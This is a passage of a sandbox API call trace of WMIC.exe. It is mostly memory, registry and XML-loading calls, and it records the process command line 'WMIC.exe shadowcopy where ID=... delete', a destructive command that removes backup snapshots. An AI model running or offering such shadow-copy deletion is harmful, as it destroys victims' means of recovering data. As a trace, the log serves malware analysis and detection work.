Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0119.962] free (_Block=0x4169a0) [0119.962] CloseHandle (hObject=0xf4) returned 1 [0119.962] malloc (_Size=0x40) returned 0x417ee0 [0119.962] malloc (_Size=0x40) returned 0x417f30 [0119.962] malloc (_Size=0x40) returned 0x417f80 [0119.962] malloc (_Size=0x20a) returned 0x4169a0 [0119.962] GetSystemDirectoryW (in: lpBuffer=0x4169a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0119.962] free (_Block=0x4169a0) [0119.962] malloc (_Size=0x18) returned 0x28dfb0 [0119.962] malloc (_Size=0x18) returned 0x4169a0 [0119.962] malloc (_Size=0x18) returned 0x4169c0 [0119.962] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0119.962] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0119.962] free (_Block=0x28dfb0) [0119.962] free (_Block=0x4169a0) [0119.962] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0119.963] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0119.963] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0119.963] FreeLibrary (hLibModule=0x77940000) returned 1 [0119.963] free (_Block=0x4169c0) [0119.963] _vsnwprintf (in: _Buffer=0x417f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x16f608 | out: _Buffer="ms_409") returned 6 [0119.963] malloc (_Size=0x20) returned 0x4169a0 [0119.963] GetComputerNameW (in: lpBuffer=0x4169a0, nSize=0x16f9e0 | out: lpBuffer="XDUWTFONO", nSize=0x16f9e0) returned 1 [0119.963] lstrlenW (lpString="XDUWTFONO") returned 9 [0119.963] malloc (_Size=0x14) returned 0x28dfb0 [0119.963] lstrlenW (lpString="XDUWTFONO") returned 9 [0119.963] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x16f9d8 | out: lpNameBuffer=0x0, nSize=0x16f9d8) returned 0x7fffffde000 [0119.964] GetLastError () returned 0xea [0119.964] malloc (_Size=0x40) returned 0x4169d0 [0119.964] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x4169d0, nSize=0x16f9d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16f9d8) returned 0x1 [0119.965] lstrlenW (lpString="") returned 0 [0119.965] lstrlenW (lpString="XDUWTFONO") returned 9 [0119.965] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0119.966] lstrlenW (lpString=".") returned 1 [0119.966] lstrlenW (lpString="XDUWTFONO") returned 9 [0119.966] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0119.966] lstrlenW (lpString="LOCALHOST") returned 9 [0119.966] lstrlenW (lpString="XDUWTFONO") returned 9 [0119.966] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0119.966] lstrlenW (lpString="XDUWTFONO") returned 9 [0119.966] lstrlenW (lpString="XDUWTFONO") returned 9 [0119.966] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0119.966] free (_Block=0x28dfb0) [0119.966] lstrlenW (lpString="XDUWTFONO") returned 9 [0119.966] malloc (_Size=0x14) returned 0x28dfb0 [0119.966] lstrlenW (lpString="XDUWTFONO") returned 9 [0119.966] lstrlenW (lpString="XDUWTFONO") returned 9 [0119.966] malloc (_Size=0x14) returned 0x416a20 [0119.966] lstrlenW (lpString="XDUWTFONO") returned 9 [0119.966] malloc (_Size=0x8) returned 0x416a40 [0119.966] malloc (_Size=0x18) returned 0x416a60 [0119.966] malloc (_Size=0x30) returned 0x416a80 [0119.966] malloc (_Size=0x18) returned 0x416ac0 [0119.966] SysStringLen (param_1="IDENTIFY") returned 0x8 [0119.966] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0119.967] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0119.967] SysStringLen (param_1="IDENTIFY") returned 0x8 [0119.967] malloc (_Size=0x30) returned 0x416ae0 [0119.967] malloc (_Size=0x18) returned 0x416b20 [0119.967] SysStringLen (param_1="IMPERSONATE") returned 0xb [0119.967] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0119.967] SysStringLen (param_1="IMPERSONATE") returned 0xb [0119.967] SysStringLen (param_1="IDENTIFY") returned 0x8 [0119.967] SysStringLen (param_1="IDENTIFY") returned 0x8 [0119.967] SysStringLen (param_1="IMPERSONATE") returned 0xb [0119.967] malloc (_Size=0x30) returned 0x416b40 [0119.967] malloc (_Size=0x18) returned 0x416b80 [0119.967] SysStringLen (param_1="DELEGATE") returned 0x8 [0119.967] SysStringLen (param_1="IDENTIFY") returned 0x8 [0119.967] SysStringLen (param_1="DELEGATE") returned 0x8 [0119.967] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0119.967] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0119.967] SysStringLen (param_1="DELEGATE") returned 0x8 [0119.967] malloc (_Size=0x30) returned 0x416ba0 [0119.967] malloc (_Size=0x18) returned 0x416be0 [0119.967] malloc (_Size=0x30) returned 0x416c00 [0119.967] malloc (_Size=0x18) returned 0x416c40 [0119.967] SysStringLen (param_1="NONE") returned 0x4 [0119.967] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.967] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.967] SysStringLen (param_1="NONE") returned 0x4 [0119.967] malloc (_Size=0x30) returned 0x416c60 [0119.967] malloc (_Size=0x18) returned 0x416ca0 [0119.967] SysStringLen (param_1="CONNECT") returned 0x7 [0119.967] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.967] malloc (_Size=0x30) returned 0x416cc0 [0119.967] malloc (_Size=0x18) returned 0x416d00 [0119.968] SysStringLen (param_1="CALL") returned 0x4 [0119.968] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.968] SysStringLen (param_1="CALL") returned 0x4 [0119.968] SysStringLen (param_1="CONNECT") returned 0x7 [0119.968] malloc (_Size=0x30) returned 0x416d20 [0119.968] malloc (_Size=0x18) returned 0x416d60 [0119.968] SysStringLen (param_1="PKT") returned 0x3 [0119.968] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.968] SysStringLen (param_1="PKT") returned 0x3 [0119.968] SysStringLen (param_1="NONE") returned 0x4 [0119.968] SysStringLen (param_1="NONE") returned 0x4 [0119.968] SysStringLen (param_1="PKT") returned 0x3 [0119.968] malloc (_Size=0x30) returned 0x416d80 [0119.968] malloc (_Size=0x18) returned 0x416dc0 [0119.968] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0119.968] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.968] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0119.968] SysStringLen (param_1="NONE") returned 0x4 [0119.968] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0119.968] SysStringLen (param_1="PKT") returned 0x3 [0119.968] SysStringLen (param_1="PKT") returned 0x3 [0119.968] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0119.968] malloc (_Size=0x30) returned 0x418000 [0119.969] malloc (_Size=0x18) returned 0x416de0 [0119.969] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0119.969] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.969] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0119.969] SysStringLen (param_1="PKT") returned 0x3 [0119.969] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0119.969] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0119.969] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0119.969] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0119.969] malloc (_Size=0x30) returned 0x418040 [0119.969] malloc (_Size=0x40) returned 0x416e00 [0119.969] malloc (_Size=0x20a) returned 0x416e50 [0119.969] GetSystemDirectoryW (in: lpBuffer=0x416e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0119.969] free (_Block=0x416e50) [0119.969] malloc (_Size=0x18) returned 0x416e50 [0119.969] malloc (_Size=0x18) returned 0x416e70 [0119.969] malloc (_Size=0x18) returned 0x416e90 [0119.969] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0119.969] SysStringLen (param_1="\\wbem\\") returned 0x6 [0119.969] free (_Block=0x416e50) [0119.969] free (_Block=0x416e70) [0119.969] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0119.969] free (_Block=0x416e90) [0119.969] malloc (_Size=0x18) returned 0x416e50 [0119.970] malloc (_Size=0x18) returned 0x416e70 [0119.970] malloc (_Size=0x18) returned 0x416e90 [0119.970] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0119.970] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0119.970] free (_Block=0x416e50) [0119.970] free (_Block=0x416e70) [0119.970] GetCurrentThreadId () returned 0xb74 [0119.970] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x16f2e0 | out: phkResult=0x16f2e0*=0xf8) returned 0x0 [0119.970] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x16f330, lpcbData=0x16f2d0*=0x400 | out: lpType=0x0, lpData=0x16f330*=0x30, lpcbData=0x16f2d0*=0x4) returned 0x0 [0119.970] _wcsicmp (_String1="0", _String2="1") returned -1 [0119.970] _wcsicmp (_String1="0", _String2="2") returned -2 [0119.970] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x16f2d0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x16f2d0*=0x42) returned 0x0 [0119.970] malloc (_Size=0x86) returned 0x416eb0 [0119.970] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x416eb0, lpcbData=0x16f2d0*=0x42 | out: lpType=0x0, lpData=0x416eb0*=0x25, lpcbData=0x16f2d0*=0x42) returned 0x0 [0119.970] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0119.970] malloc (_Size=0x42) returned 0x416f40 [0119.970] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0119.970] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x16f330, lpcbData=0x16f2d0*=0x400 | out: lpType=0x0, lpData=0x16f330*=0x36, lpcbData=0x16f2d0*=0xc) returned 0x0 [0119.970] _wtol (_String="65536") returned 65536 [0119.970] free (_Block=0x416eb0) [0119.970] RegCloseKey (hKey=0x0) returned 0x6 [0119.970] CoCreateInstance (in: rclsid=0xff8b7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff8b73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x16f7d8 | out: ppv=0x16f7d8*=0x22871d0) returned 0x0 [0119.987] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x22871d0, xmlSource=0x16f920*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x416e50), isSuccessful=0x16f990 | out: isSuccessful=0x16f990*=0xffff) returned 0x0 [0120.082] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x22871d0, DOMElement=0x16f7d0 | out: DOMElement=0x16f7d0) returned 0x0 [0120.082] malloc (_Size=0x18) returned 0x416e50 [0120.082] free (_Block=0x416e50) [0120.082] malloc (_Size=0x18) returned 0x416e50 [0120.083] free (_Block=0x416e50) [0120.083] malloc (_Size=0x18) returned 0x416e50 [0120.083] malloc (_Size=0x18) returned 0x416e70 [0120.083] malloc (_Size=0x30) returned 0x418080 [0120.083] malloc (_Size=0x18) returned 0x416eb0 [0120.083] free (_Block=0x416eb0) [0120.083] malloc (_Size=0x18) returned 0x41c560 [0120.083] malloc (_Size=0x18) returned 0x41c580 [0120.084] SysStringLen (param_1="VALUE") returned 0x5 [0120.084] SysStringLen (param_1="TABLE") returned 0x5 [0120.084] SysStringLen (param_1="TABLE") returned 0x5 [0120.084] SysStringLen (param_1="VALUE") returned 0x5 [0120.084] malloc (_Size=0x30) returned 0x4180c0 [0120.084] malloc (_Size=0x18) returned 0x41c5a0 [0120.084] free (_Block=0x41c5a0) [0120.084] malloc (_Size=0x18) returned 0x41c5a0 [0120.084] malloc (_Size=0x18) returned 0x41c5c0 [0120.084] SysStringLen (param_1="LIST") returned 0x4 [0120.084] SysStringLen (param_1="TABLE") returned 0x5 [0120.084] malloc (_Size=0x30) returned 0x418100 [0120.085] malloc (_Size=0x18) returned 0x41c5e0 [0120.085] free (_Block=0x41c5e0) [0120.085] malloc (_Size=0x18) returned 0x41c5e0 [0120.085] malloc (_Size=0x18) returned 0x41c600 [0120.085] SysStringLen (param_1="RAWXML") returned 0x6 [0120.085] SysStringLen (param_1="TABLE") returned 0x5 [0120.085] SysStringLen (param_1="RAWXML") returned 0x6 [0120.085] SysStringLen (param_1="LIST") returned 0x4 [0120.085] SysStringLen (param_1="LIST") returned 0x4 [0120.085] SysStringLen (param_1="RAWXML") returned 0x6 [0120.085] malloc (_Size=0x30) returned 0x418140 [0120.085] malloc (_Size=0x18) returned 0x41c620 [0120.085] free (_Block=0x41c620) [0120.086] malloc (_Size=0x18) returned 0x41c620 [0120.086] malloc (_Size=0x18) returned 0x41c640 [0120.086] SysStringLen (param_1="HTABLE") returned 0x6 [0120.086] SysStringLen (param_1="TABLE") returned 0x5 [0120.086] SysStringLen (param_1="HTABLE") returned 0x6 [0120.086] SysStringLen (param_1="LIST") returned 0x4 [0120.086] malloc (_Size=0x30) returned 0x418180 [0120.086] malloc (_Size=0x18) returned 0x41c660 [0120.086] free (_Block=0x41c660) [0120.086] malloc (_Size=0x18) returned 0x41c660 [0120.086] malloc (_Size=0x18) returned 0x41c680 [0120.086] SysStringLen (param_1="HFORM") returned 0x5 [0120.086] SysStringLen (param_1="TABLE") returned 0x5 [0120.086] SysStringLen (param_1="HFORM") returned 0x5 [0120.087] SysStringLen (param_1="LIST") returned 0x4 [0120.087] SysStringLen (param_1="HFORM") returned 0x5 [0120.087] SysStringLen (param_1="HTABLE") returned 0x6 [0120.087] malloc (_Size=0x30) returned 0x4181c0 [0120.087] malloc (_Size=0x18) returned 0x41c6a0 [0120.087] free (_Block=0x41c6a0) [0120.087] malloc (_Size=0x18) returned 0x41c6a0 [0120.087] malloc (_Size=0x18) returned 0x41c6c0 [0120.087] SysStringLen (param_1="XML") returned 0x3 [0120.087] SysStringLen (param_1="TABLE") returned 0x5 [0120.087] SysStringLen (param_1="XML") returned 0x3 [0120.087] SysStringLen (param_1="VALUE") returned 0x5 [0120.087] SysStringLen (param_1="VALUE") returned 0x5 [0120.087] SysStringLen (param_1="XML") returned 0x3 [0120.087] malloc (_Size=0x30) returned 0x418200 [0120.088] malloc (_Size=0x18) returned 0x41c6e0 [0120.088] free (_Block=0x41c6e0) [0120.088] malloc (_Size=0x18) returned 0x41c6e0 [0120.088] malloc (_Size=0x18) returned 0x41c700 [0120.088] SysStringLen (param_1="MOF") returned 0x3 [0120.088] SysStringLen (param_1="TABLE") returned 0x5 [0120.088] SysStringLen (param_1="MOF") returned 0x3 [0120.088] SysStringLen (param_1="LIST") returned 0x4 [0120.088] SysStringLen (param_1="MOF") returned 0x3 [0120.088] SysStringLen (param_1="RAWXML") returned 0x6 [0120.088] SysStringLen (param_1="LIST") returned 0x4 [0120.088] SysStringLen (param_1="MOF") returned 0x3 [0120.088] malloc (_Size=0x30) returned 0x418240 [0120.088] malloc (_Size=0x18) returned 0x41c720 [0120.089] free (_Block=0x41c720) [0120.089] malloc (_Size=0x18) returned 0x41c720 [0120.089] malloc (_Size=0x18) returned 0x41c740 [0120.089] SysStringLen (param_1="CSV") returned 0x3 [0120.089] SysStringLen (param_1="TABLE") returned 0x5 [0120.089] SysStringLen (param_1="CSV") returned 0x3 [0120.089] SysStringLen (param_1="LIST") returned 0x4 [0120.089] SysStringLen (param_1="CSV") returned 0x3 [0120.089] SysStringLen (param_1="HTABLE") returned 0x6 [0120.089] SysStringLen (param_1="CSV") returned 0x3 [0120.089] SysStringLen (param_1="HFORM") returned 0x5 [0120.089] malloc (_Size=0x30) returned 0x418280 [0120.089] malloc (_Size=0x18) returned 0x41c760 [0120.090] free (_Block=0x41c760) [0120.090] malloc (_Size=0x18) returned 0x41c760 [0120.090] malloc (_Size=0x18) returned 0x41c780 [0120.090] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.090] SysStringLen (param_1="TABLE") returned 0x5 [0120.090] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.090] SysStringLen (param_1="VALUE") returned 0x5 [0120.090] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.090] SysStringLen (param_1="XML") returned 0x3 [0120.090] SysStringLen (param_1="XML") returned 0x3 [0120.090] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.090] malloc (_Size=0x30) returned 0x4182c0 [0120.090] malloc (_Size=0x18) returned 0x41c7a0 [0120.090] free (_Block=0x41c7a0) [0120.091] malloc (_Size=0x18) returned 0x41c7a0 [0120.091] malloc (_Size=0x18) returned 0x41c7c0 [0120.091] SysStringLen (param_1="texttablewsys") returned 0xd [0120.091] SysStringLen (param_1="TABLE") returned 0x5 [0120.091] SysStringLen (param_1="texttablewsys") returned 0xd [0120.091] SysStringLen (param_1="XML") returned 0x3 [0120.091] SysStringLen (param_1="texttablewsys") returned 0xd [0120.091] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.091] SysStringLen (param_1="XML") returned 0x3 [0120.091] SysStringLen (param_1="texttablewsys") returned 0xd [0120.091] malloc (_Size=0x30) returned 0x418300 [0120.091] malloc (_Size=0x18) returned 0x41c7e0 [0120.091] free (_Block=0x41c7e0) [0120.091] malloc (_Size=0x18) returned 0x41c7e0 [0120.091] malloc (_Size=0x18) returned 0x41c800 [0120.092] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.092] SysStringLen (param_1="TABLE") returned 0x5 [0120.092] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.092] SysStringLen (param_1="XML") returned 0x3 [0120.092] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.092] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.092] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.092] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.092] malloc (_Size=0x30) returned 0x418340 [0120.092] malloc (_Size=0x18) returned 0x41c820 [0120.092] free (_Block=0x41c820) [0120.092] malloc (_Size=0x18) returned 0x41c820 [0120.092] malloc (_Size=0x18) returned 0x41c840 [0120.092] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.092] SysStringLen (param_1="TABLE") returned 0x5 [0120.093] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.093] SysStringLen (param_1="XML") returned 0x3 [0120.093] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.093] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.093] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.093] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.093] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.093] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.093] malloc (_Size=0x30) returned 0x418380 [0120.093] malloc (_Size=0x18) returned 0x41c860 [0120.093] free (_Block=0x41c860) [0120.093] malloc (_Size=0x18) returned 0x41c860 [0120.093] malloc (_Size=0x18) returned 0x41c880 [0120.093] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.093] SysStringLen (param_1="TABLE") returned 0x5 [0120.093] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.093] SysStringLen (param_1="XML") returned 0x3 [0120.094] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.094] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.094] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.094] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.094] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.094] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.094] malloc (_Size=0x30) returned 0x4183c0 [0120.094] malloc (_Size=0x18) returned 0x41c8a0 [0120.094] free (_Block=0x41c8a0) [0120.094] malloc (_Size=0x18) returned 0x41c8a0 [0120.094] malloc (_Size=0x18) returned 0x41c8c0 [0120.094] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0120.094] SysStringLen (param_1="TABLE") returned 0x5 [0120.094] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0120.094] SysStringLen (param_1="XML") returned 0x3 [0120.095] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0120.095] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.095] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0120.095] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.095] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0120.095] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.095] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.095] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0120.095] malloc (_Size=0x30) returned 0x418400 [0120.095] malloc (_Size=0x18) returned 0x41c8e0 [0120.095] free (_Block=0x41c8e0) [0120.095] malloc (_Size=0x18) returned 0x41c8e0 [0120.095] malloc (_Size=0x18) returned 0x41c900 [0120.095] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0120.095] SysStringLen (param_1="TABLE") returned 0x5 [0120.095] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0120.095] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.096] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0120.096] SysStringLen (param_1="XML") returned 0x3 [0120.096] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0120.096] SysStringLen (param_1="texttablewsys") returned 0xd [0120.096] SysStringLen (param_1="XML") returned 0x3 [0120.096] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0120.096] malloc (_Size=0x30) returned 0x418440 [0120.096] malloc (_Size=0x18) returned 0x41c920 [0120.096] free (_Block=0x41c920) [0120.096] malloc (_Size=0x18) returned 0x41c920 [0120.096] malloc (_Size=0x18) returned 0x41c940 [0120.096] SysStringLen (param_1="htable-sortby") returned 0xd [0120.096] SysStringLen (param_1="TABLE") returned 0x5 [0120.096] SysStringLen (param_1="htable-sortby") returned 0xd [0120.096] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.096] SysStringLen (param_1="htable-sortby") returned 0xd [0120.096] SysStringLen (param_1="XML") returned 0x3 [0120.096] SysStringLen (param_1="htable-sortby") returned 0xd [0120.097] SysStringLen (param_1="texttablewsys") returned 0xd [0120.097] SysStringLen (param_1="htable-sortby") returned 0xd [0120.097] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0120.097] SysStringLen (param_1="XML") returned 0x3 [0120.097] SysStringLen (param_1="htable-sortby") returned 0xd [0120.097] malloc (_Size=0x30) returned 0x418480 [0120.097] malloc (_Size=0x18) returned 0x41c960 [0120.097] free (_Block=0x41c960) [0120.097] malloc (_Size=0x18) returned 0x41c960 [0120.097] malloc (_Size=0x18) returned 0x41c980 [0120.097] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0120.097] SysStringLen (param_1="TABLE") returned 0x5 [0120.097] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0120.097] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.097] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0120.097] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.097] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0120.098] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.098] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.098] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0120.098] malloc (_Size=0x30) returned 0x4184c0 [0120.098] malloc (_Size=0x18) returned 0x41c9a0 [0120.098] free (_Block=0x41c9a0) [0120.098] malloc (_Size=0x18) returned 0x41c9a0 [0120.098] malloc (_Size=0x18) returned 0x41c9c0 [0120.098] SysStringLen (param_1="wmiclimofformat") returned 0xf [0120.098] SysStringLen (param_1="TABLE") returned 0x5 [0120.098] SysStringLen (param_1="wmiclimofformat") returned 0xf [0120.098] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.098] SysStringLen (param_1="wmiclimofformat") returned 0xf [0120.098] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.098] SysStringLen (param_1="wmiclimofformat") returned 0xf [0120.098] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.098] SysStringLen (param_1="wmiclimofformat") returned 0xf [0120.099] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0120.099] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.099] SysStringLen (param_1="wmiclimofformat") returned 0xf [0120.099] malloc (_Size=0x30) returned 0x418500 [0120.099] malloc (_Size=0x18) returned 0x41c9e0 [0120.099] free (_Block=0x41c9e0) [0120.099] malloc (_Size=0x18) returned 0x41c9e0 [0120.099] malloc (_Size=0x18) returned 0x41ca00 [0120.099] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0120.099] SysStringLen (param_1="TABLE") returned 0x5 [0120.099] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0120.099] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.099] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0120.099] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.099] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0120.099] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.100] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.100] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0120.100] malloc (_Size=0x30) returned 0x418540 [0120.100] malloc (_Size=0x18) returned 0x41ca20 [0120.100] free (_Block=0x41ca20) [0120.100] malloc (_Size=0x18) returned 0x41ca20 [0120.100] malloc (_Size=0x18) returned 0x41ca40 [0120.100] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0120.100] SysStringLen (param_1="TABLE") returned 0x5 [0120.100] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0120.100] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.100] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0120.100] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.100] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0120.100] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.100] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0120.100] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0120.101] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.101] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0120.101] malloc (_Size=0x30) returned 0x418580 [0120.101] FreeThreadedDOMDocument:IUnknown:Release (This=0x22871d0) returned 0x0 [0120.101] free (_Block=0x416e90) [0120.101] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete" [0120.101] malloc (_Size=0xe0) returned 0x41cd30 [0120.101] memcpy_s (in: _Destination=0x41cd30, _DestinationSize=0xde, _Source=0x1825be, _SourceSize=0xd0 | out: _Destination=0x41cd30) returned 0x0 [0120.101] malloc (_Size=0x18) returned 0x41ca60 [0120.101] malloc (_Size=0x18) returned 0x41ca80 [0120.101] malloc (_Size=0x18) returned 0x41caa0 [0120.102] malloc (_Size=0x18) returned 0x41cac0 [0120.102] malloc (_Size=0x80) returned 0x416e90 [0120.102] GetLocalTime (in: lpSystemTime=0x16f970 | out: lpSystemTime=0x16f970*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, 